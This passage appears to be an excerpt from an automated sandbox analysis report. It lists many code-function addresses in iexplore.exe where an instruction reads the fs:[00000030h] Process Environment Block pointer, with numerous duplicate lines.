          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D51EF mov eax, dword ptr fs:[00000030h]1_2_036D51EF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B51ED mov eax, dword ptr fs:[00000030h]1_2_036B51ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037571F9 mov esi, dword ptr fs:[00000030h]1_2_037571F9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E01F8 mov eax, dword ptr fs:[00000030h]1_2_036E01F8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037861E5 mov eax, dword ptr fs:[00000030h]1_2_037861E5
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov ecx, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372E1D0 mov eax, dword ptr fs:[00000030h]1_2_0372E1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037851CB mov eax, dword ptr fs:[00000030h]1_2_037851CB
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037761C3 mov eax, dword ptr fs:[00000030h]1_2_037761C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037761C3 mov eax, dword ptr fs:[00000030h]1_2_037761C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036ED1D0 mov eax, dword ptr fs:[00000030h]1_2_036ED1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036ED1D0 mov ecx, dword ptr fs:[00000030h]1_2_036ED1D0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037611A4 mov eax, dword ptr fs:[00000030h]1_2_037611A4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CB1B0 mov eax, dword ptr fs:[00000030h]1_2_036CB1B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03707190 mov eax, dword ptr fs:[00000030h]1_2_03707190
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F0185 mov eax, dword ptr fs:[00000030h]1_2_036F0185
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373019F mov eax, dword ptr fs:[00000030h]1_2_0373019F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA197 mov eax, dword ptr fs:[00000030h]1_2_036AA197
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA197 mov eax, dword ptr fs:[00000030h]1_2_036AA197
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA197 mov eax, dword ptr fs:[00000030h]1_2_036AA197
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376C188 mov eax, dword ptr fs:[00000030h]1_2_0376C188
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376C188 mov eax, dword ptr fs:[00000030h]1_2_0376C188
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372D070 mov ecx, dword ptr fs:[00000030h]1_2_0372D070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03785060 mov eax, dword ptr fs:[00000030h]1_2_03785060
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov ecx, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C1070 mov eax, dword ptr fs:[00000030h]1_2_036C1070
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373106E mov eax, dword ptr fs:[00000030h]1_2_0373106E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DC073 mov eax, dword ptr fs:[00000030h]1_2_036DC073
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03736050 mov eax, dword ptr fs:[00000030h]1_2_03736050
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375705E mov ebx, dword ptr fs:[00000030h]1_2_0375705E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0375705E mov eax, dword ptr fs:[00000030h]1_2_0375705E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B2050 mov eax, dword ptr fs:[00000030h]1_2_036B2050
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DB052 mov eax, dword ptr fs:[00000030h]1_2_036DB052
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03746030 mov eax, dword ptr fs:[00000030h]1_2_03746030
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377903E mov eax, dword ptr fs:[00000030h]1_2_0377903E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA020 mov eax, dword ptr fs:[00000030h]1_2_036AA020
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AC020 mov eax, dword ptr fs:[00000030h]1_2_036AC020
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03734000 mov ecx, dword ptr fs:[00000030h]1_2_03734000
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE016 mov eax, dword ptr fs:[00000030h]1_2_036CE016
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B80E9 mov eax, dword ptr fs:[00000030h]1_2_036B80E9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D50E4 mov eax, dword ptr fs:[00000030h]1_2_036D50E4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D50E4 mov ecx, dword ptr fs:[00000030h]1_2_036D50E4
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AA0E3 mov ecx, dword ptr fs:[00000030h]1_2_036AA0E3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037360E0 mov eax, dword ptr fs:[00000030h]1_2_037360E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AC0F0 mov eax, dword ptr fs:[00000030h]1_2_036AC0F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F20F0 mov ecx, dword ptr fs:[00000030h]1_2_036F20F0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037850D9 mov eax, dword ptr fs:[00000030h]1_2_037850D9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov ecx, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov ecx, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov ecx, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov ecx, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C70C0 mov eax, dword ptr fs:[00000030h]1_2_036C70C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037320DE mov eax, dword ptr fs:[00000030h]1_2_037320DE
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372D0C0 mov eax, dword ptr fs:[00000030h]1_2_0372D0C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372D0C0 mov eax, dword ptr fs:[00000030h]1_2_0372D0C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D90DB mov eax, dword ptr fs:[00000030h]1_2_036D90DB
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037760B8 mov eax, dword ptr fs:[00000030h]1_2_037760B8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037760B8 mov ecx, dword ptr fs:[00000030h]1_2_037760B8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037480A8 mov eax, dword ptr fs:[00000030h]1_2_037480A8
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B208A mov eax, dword ptr fs:[00000030h]1_2_036B208A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AD08D mov eax, dword ptr fs:[00000030h]1_2_036AD08D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E909C mov eax, dword ptr fs:[00000030h]1_2_036E909C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373D080 mov eax, dword ptr fs:[00000030h]1_2_0373D080
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373D080 mov eax, dword ptr fs:[00000030h]1_2_0373D080
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B5096 mov eax, dword ptr fs:[00000030h]1_2_036B5096
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DD090 mov eax, dword ptr fs:[00000030h]1_2_036DD090
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DD090 mov eax, dword ptr fs:[00000030h]1_2_036DD090
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB765 mov eax, dword ptr fs:[00000030h]1_2_036AB765
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB765 mov eax, dword ptr fs:[00000030h]1_2_036AB765
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB765 mov eax, dword ptr fs:[00000030h]1_2_036AB765
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AB765 mov eax, dword ptr fs:[00000030h]1_2_036AB765
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B8770 mov eax, dword ptr fs:[00000030h]1_2_036B8770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C0770 mov eax, dword ptr fs:[00000030h]1_2_036C0770
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E674D mov esi, dword ptr fs:[00000030h]1_2_036E674D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E674D mov eax, dword ptr fs:[00000030h]1_2_036E674D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E674D mov eax, dword ptr fs:[00000030h]1_2_036E674D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03734755 mov eax, dword ptr fs:[00000030h]1_2_03734755
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C3740 mov eax, dword ptr fs:[00000030h]1_2_036C3740
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C3740 mov eax, dword ptr fs:[00000030h]1_2_036C3740
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036C3740 mov eax, dword ptr fs:[00000030h]1_2_036C3740
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373E75D mov eax, dword ptr fs:[00000030h]1_2_0373E75D
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_03783749 mov eax, dword ptr fs:[00000030h]1_2_03783749
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B0750 mov eax, dword ptr fs:[00000030h]1_2_036B0750
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2750 mov eax, dword ptr fs:[00000030h]1_2_036F2750
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036F2750 mov eax, dword ptr fs:[00000030h]1_2_036F2750
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0372C730 mov eax, dword ptr fs:[00000030h]1_2_0372C730
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0378B73C mov eax, dword ptr fs:[00000030h]1_2_0378B73C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0378B73C mov eax, dword ptr fs:[00000030h]1_2_0378B73C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0378B73C mov eax, dword ptr fs:[00000030h]1_2_0378B73C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0378B73C mov eax, dword ptr fs:[00000030h]1_2_0378B73C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B3720 mov eax, dword ptr fs:[00000030h]1_2_036B3720
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CF720 mov eax, dword ptr fs:[00000030h]1_2_036CF720
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CF720 mov eax, dword ptr fs:[00000030h]1_2_036CF720
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CF720 mov eax, dword ptr fs:[00000030h]1_2_036CF720
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EC720 mov eax, dword ptr fs:[00000030h]1_2_036EC720
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EC720 mov eax, dword ptr fs:[00000030h]1_2_036EC720
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B973A mov eax, dword ptr fs:[00000030h]1_2_036B973A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B973A mov eax, dword ptr fs:[00000030h]1_2_036B973A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E273C mov eax, dword ptr fs:[00000030h]1_2_036E273C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E273C mov ecx, dword ptr fs:[00000030h]1_2_036E273C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E273C mov eax, dword ptr fs:[00000030h]1_2_036E273C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376F72E mov eax, dword ptr fs:[00000030h]1_2_0376F72E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9730 mov eax, dword ptr fs:[00000030h]1_2_036A9730
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036A9730 mov eax, dword ptr fs:[00000030h]1_2_036A9730
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E5734 mov eax, dword ptr fs:[00000030h]1_2_036E5734
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377972B mov eax, dword ptr fs:[00000030h]1_2_0377972B
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B7703 mov eax, dword ptr fs:[00000030h]1_2_036B7703
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B5702 mov eax, dword ptr fs:[00000030h]1_2_036B5702
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B5702 mov eax, dword ptr fs:[00000030h]1_2_036B5702
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EC700 mov eax, dword ptr fs:[00000030h]1_2_036EC700
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EF71F mov eax, dword ptr fs:[00000030h]1_2_036EF71F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EF71F mov eax, dword ptr fs:[00000030h]1_2_036EF71F
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B0710 mov eax, dword ptr fs:[00000030h]1_2_036B0710
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E0710 mov eax, dword ptr fs:[00000030h]1_2_036E0710
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D27ED mov eax, dword ptr fs:[00000030h]1_2_036D27ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D27ED mov eax, dword ptr fs:[00000030h]1_2_036D27ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036D27ED mov eax, dword ptr fs:[00000030h]1_2_036D27ED
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BD7E0 mov ecx, dword ptr fs:[00000030h]1_2_036BD7E0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373E7E1 mov eax, dword ptr fs:[00000030h]1_2_0373E7E1
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036BC7C0 mov eax, dword ptr fs:[00000030h]1_2_036BC7C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B57C0 mov eax, dword ptr fs:[00000030h]1_2_036B57C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B57C0 mov eax, dword ptr fs:[00000030h]1_2_036B57C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B57C0 mov eax, dword ptr fs:[00000030h]1_2_036B57C0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037307C3 mov eax, dword ptr fs:[00000030h]1_2_037307C3
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B07AF mov eax, dword ptr fs:[00000030h]1_2_036B07AF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037837B6 mov eax, dword ptr fs:[00000030h]1_2_037837B6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036AF7BA mov eax, dword ptr fs:[00000030h]1_2_036AF7BA
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_037397A9 mov eax, dword ptr fs:[00000030h]1_2_037397A9
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373F7AF mov eax, dword ptr fs:[00000030h]1_2_0373F7AF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373F7AF mov eax, dword ptr fs:[00000030h]1_2_0373F7AF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373F7AF mov eax, dword ptr fs:[00000030h]1_2_0373F7AF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373F7AF mov eax, dword ptr fs:[00000030h]1_2_0373F7AF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0373F7AF mov eax, dword ptr fs:[00000030h]1_2_0373F7AF
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036DD7B0 mov eax, dword ptr fs:[00000030h]1_2_036DD7B0
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0376F78A mov eax, dword ptr fs:[00000030h]1_2_0376F78A
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA660 mov eax, dword ptr fs:[00000030h]1_2_036EA660
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036EA660 mov eax, dword ptr fs:[00000030h]1_2_036EA660
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E9660 mov eax, dword ptr fs:[00000030h]1_2_036E9660
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E9660 mov eax, dword ptr fs:[00000030h]1_2_036E9660
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377866E mov eax, dword ptr fs:[00000030h]1_2_0377866E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_0377866E mov eax, dword ptr fs:[00000030h]1_2_0377866E
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036E2674 mov eax, dword ptr fs:[00000030h]1_2_036E2674
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CC640 mov eax, dword ptr fs:[00000030h]1_2_036CC640
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036B262C mov eax, dword ptr fs:[00000030h]1_2_036B262C
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 1_2_036CE627 mov eax, dword ptr fs:[00000030h]1_2_036CE627
